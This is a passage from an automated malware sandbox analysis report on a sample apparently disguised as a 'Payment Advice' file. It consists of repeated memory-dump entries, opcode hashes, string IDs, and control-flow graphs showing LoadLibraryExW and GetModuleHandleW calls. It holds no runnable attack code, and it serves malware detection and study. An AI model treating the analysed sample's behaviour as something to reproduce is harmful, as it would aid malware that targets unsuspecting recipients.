                                                                                      • Opcode ID: 47b7b2de390a53f39a663d828032fdcd996c8b439410c724eee5f94218327fdb
                                                                                      • Instruction ID: 5375aec0b82e44488c88c550d1ed2c38a1f15de837d73b45fb6fe5aef86e78fa
                                                                                      • Opcode Fuzzy Hash: 47b7b2de390a53f39a663d828032fdcd996c8b439410c724eee5f94218327fdb
                                                                                      • Instruction Fuzzy Hash: 3201A720B602245BEF64396DDD5572F208EC7C7754F20483AE70AEB3A5C96ACC8103E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4118366495.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_efd000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4118366495.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_efd000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4118366495.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_efd000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4118366495.0000000000EFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_efd000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2222239885
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-3823777903
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-390881366
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LR^q$LR^q$$^q$$^q
                                                                                      • API String ID: 0-2454687669
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:3.6%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:10
                                                                                      Total number of Limit Nodes:1
                                                                                      execution_graph 9959 30bdd88 9960 30bdd9c 9959->9960 9961 30bddc1 9960->9961 9963 30bcea8 9960->9963 9964 30bdf48 LoadLibraryExW 9963->9964 9966 30bdfc1 9964->9966 9966->9961 9967 30bdce0 9968 30bdd28 GetModuleHandleW 9967->9968 9969 30bdd22 9967->9969 9970 30bdd55 9968->9970 9969->9968

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 139 30bcea8-30bdf88 141 30bdf8a-30bdf8d 139->141 142 30bdf90-30bdfbf LoadLibraryExW 139->142 141->142 143 30bdfc8-30bdfe5 142->143 144 30bdfc1-30bdfc7 142->144 144->143
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030BDDC1,00000800,00000000,00000000), ref: 030BDFB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1756057889.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_30b0000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 147 30bdce0-30bdd20 148 30bdd28-30bdd53 GetModuleHandleW 147->148 149 30bdd22-30bdd25 147->149 150 30bdd5c-30bdd70 148->150 151 30bdd55-30bdd5b 148->151 149->148 151->150
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 030BDD46
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1756057889.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_30b0000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 287 170d06c-170d07e 288 170d084 287->288 289 170d118-170d11f 287->289 290 170d086-170d092 288->290 289->290 291 170d124-170d129 290->291 292 170d098-170d0ba 290->292 291->292 294 170d0bc-170d0e0 292->294 295 170d12e-170d143 292->295 297 170d0e8-170d0f8 294->297 300 170d0fa-170d102 295->300 299 170d150 297->299 297->300 301 170d104-170d115 300->301 302 170d145-170d14e 300->302 302->301
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755448547.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_170d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 344 171d2f0-171d302 345 171d391-171d398 344->345 346 171d308 344->346 347 171d30a-171d316 345->347 346->347 348 171d39d-171d3a2 347->348 349 171d31c-171d33e 347->349 348->349 351 171d340-171d35a 349->351 352 171d3a7-171d3bc 349->352 354 171d362-171d371 351->354 356 171d373-171d37b 352->356 354->356 357 171d3c9 354->357 358 171d37d-171d38e 356->358 359 171d3be-171d3c7 356->359 359->358
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755547807.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_171d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 327 171d01c-171d02e 328 171d034 327->328 329 171d0bd-171d0c4 327->329 330 171d036-171d042 328->330 329->330 331 171d0c9-171d0ce 330->331 332 171d048-171d06a 330->332 331->332 334 171d0d3-171d0e8 332->334 335 171d06c-171d086 332->335 339 171d09f-171d0a7 334->339 338 171d08e-171d09d 335->338 338->339 340 171d0f5 338->340 341 171d0a9-171d0ba 339->341 342 171d0ea-171d0f3 339->342 342->341
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755547807.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_171d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755448547.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_170d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755547807.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_171d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: ed309e2f5d871b37b5dfe32975a0fe1cc80b56fc1d989dc6d196ab19f755e727
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: F611BE75504280CFDB12CF58D5C8B16FF61FB44314F24C6AAD8094B65AC33AD44ACF62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755547807.000000000171D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0171D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_171d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: 6a31dc3f1ca4e4b52e3a81aade37200026998f2d62719b38cf329152dbeec05c
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: BC11BB75504280CFDB16CF58D5C8B15FFA2FB84314F24C6AAD8494B25AC33AD40ACF61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755448547.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_170d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da647802a086e59154be948edba55a17963cbe4c7439879ce4728380e18294b8
                                                                                      • Instruction ID: f305a30c16c881cdd557cd2c4dc33af053d7e918b2d095dc9e7e54a9d097f91a
                                                                                      • Opcode Fuzzy Hash: da647802a086e59154be948edba55a17963cbe4c7439879ce4728380e18294b8
                                                                                      • Instruction Fuzzy Hash: 2D01A271008344DAE7228EEEC984B67FFD9EF45324F18C46AED494A2C6C2799840C6B1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.1755448547.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_9_2_170d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d73979e6985224f2a7ea5801e04ea94c05e6d02f8a0c68d5f535e86e5b582653
                                                                                      • Instruction ID: 810d7b61fd1ab9e7689d67bfd7ca4f391a32a5eb4859caba93ede7b9ddeeb516
                                                                                      • Opcode Fuzzy Hash: d73979e6985224f2a7ea5801e04ea94c05e6d02f8a0c68d5f535e86e5b582653
                                                                                      • Instruction Fuzzy Hash: 49F06271404344AAE7218A5AC9C8B66FFE9EB45624F18C45AED484A2C6C2799844CAB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:13.7%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:27
                                                                                      Total number of Limit Nodes:5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      • Opcode ID: 458a4637299490107713f2075b2d26b3915106c62064a85f001b45b102c68c12
                                                                                      • Instruction ID: 3a175fd08038d7a24dda9d341bf4720cb440e4178a0a54b96feb213761722842
                                                                                      • Opcode Fuzzy Hash: 458a4637299490107713f2075b2d26b3915106c62064a85f001b45b102c68c12
                                                                                      • Instruction Fuzzy Hash: DF322131E1071A8FCB15EFB5C85499DB7B6FFC9700F14C6AAD409AB215EB309985CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: 757653f3ce36c27aed3b285acb4fa10591412c1dbb1f2ce162d6cf999818c9b3
                                                                                      • Instruction ID: 898c4a93e42d2b17cca0985acdd25d32d2fc82c445e71733eeaf701cffed2a3a
                                                                                      • Opcode Fuzzy Hash: 757653f3ce36c27aed3b285acb4fa10591412c1dbb1f2ce162d6cf999818c9b3
                                                                                      • Instruction Fuzzy Hash: 7E02DF30B002058FDB55EF68D990AAEB7E2FF85304F64856AE405DB395DB35EC86CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $
                                                                                      • API String ID: 0-3993045852
                                                                                      • Opcode ID: 7e8a9b2156f1bdc26738ccb0fde9c16b203bc1a60f057c8d8cd40f2e88d9880a
                                                                                      • Instruction ID: ad068328689a845d9dc0d637cb44ce27dcdbcd685bb4ada38f9c3be673c7c69a
                                                                                      • Opcode Fuzzy Hash: 7e8a9b2156f1bdc26738ccb0fde9c16b203bc1a60f057c8d8cd40f2e88d9880a
                                                                                      • Instruction Fuzzy Hash: 6C22B135E002158FDFA9EF64C4806AEB7F2EF85310F20846AD449AB345DB35DD45CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 66c39f7672e6f009e4348d10a6a926142d7d6358ff805c9308ce5a5a6d4c9f66
                                                                                      • Instruction ID: d05fee9a5617486ad45e6fbc32108bfb3f73bf28607dc5a7b9358dcf1f5e4741
                                                                                      • Opcode Fuzzy Hash: 66c39f7672e6f009e4348d10a6a926142d7d6358ff805c9308ce5a5a6d4c9f66
                                                                                      • Instruction Fuzzy Hash: CE926834A00204CFDB65EF68C584A6EBBF2FB48314F5484AAD809DB365DB75ED85CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a17e33668908494395cbc8305da5178fee2cb2e1c411d295679f0bf097dbfe8
                                                                                      • Instruction ID: 555da6da8bf8cfbea0b0bd2d416de839ccd610f003fb6739ce45e434d75fa88b
                                                                                      • Opcode Fuzzy Hash: 1a17e33668908494395cbc8305da5178fee2cb2e1c411d295679f0bf097dbfe8
                                                                                      • Instruction Fuzzy Hash: 3562B130B00204CFDB95EB68D594AAEB7F2EF85304F15846AE40AEB355DB35ED46CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b9064f151ecb7a6449084743eb22d8ce55a764e5271fd9d731ce96128e1eb64
                                                                                      • Instruction ID: 226dcaef30b5067596246ee3e11feb9274bf12ab64478f020ea16e2244c31530
                                                                                      • Opcode Fuzzy Hash: 0b9064f151ecb7a6449084743eb22d8ce55a764e5271fd9d731ce96128e1eb64
                                                                                      • Instruction Fuzzy Hash: 35329F34B002099FDF55EB68D980BAEB7B2FB88310F14856AE405E7355DB35EC46CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10c5e3a339e15f85712e34a10d2068d622f4868645a18e1863417b1973ae9e5b
                                                                                      • Instruction ID: 03e5db01b641795e854a519154cc1b7e8838ddf94c037d0edda22df5e44354dc
                                                                                      • Opcode Fuzzy Hash: 10c5e3a339e15f85712e34a10d2068d622f4868645a18e1863417b1973ae9e5b
                                                                                      • Instruction Fuzzy Hash: FC227230E102098FDF65EB68D584BAEB7F6EB85310F248966E409EB391CA35DC85CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-3823777903
                                                                                      • Opcode ID: 565055d87d64fb702f17903908d59095358f27b78134504bf023bcedb67293e5
                                                                                      • Instruction ID: 46f242c79bf943df17f7d461be42393db40f9bd4b48d8d248c16c30685d45b84
                                                                                      • Opcode Fuzzy Hash: 565055d87d64fb702f17903908d59095358f27b78134504bf023bcedb67293e5
                                                                                      • Instruction Fuzzy Hash: 7AE16E30E102098FCB66EF69D9846AEB7F2EF85300F24896BD405DB355DB75D886CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      • Opcode ID: 133c5eefcdf977f4a0dcf7723bfa594f03055be4ed863192ee40d3bd5a979db6
